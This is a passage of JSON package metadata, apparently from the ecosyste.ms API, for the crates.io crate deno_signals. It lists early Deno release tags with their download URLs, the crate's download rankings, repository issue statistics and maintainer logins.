ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T16:31:16.662Z","dependent_packages_count":0,"downloads":92720,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.71074800844977,"dependent_repos_count":20.954417042070702,"dependent_packages_count":27.748339314346797,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":47.804501454955755},"purl":"pkg:cargo/deno_signals","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_signals","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_signals","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_signals/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_signals/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-07-08T12:38:14.524Z","updated_at":"2025-07-08T12:38:14.524Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-07-08T12:38:14.628Z","updated_at":"2025-07-08T12:38:14.628Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.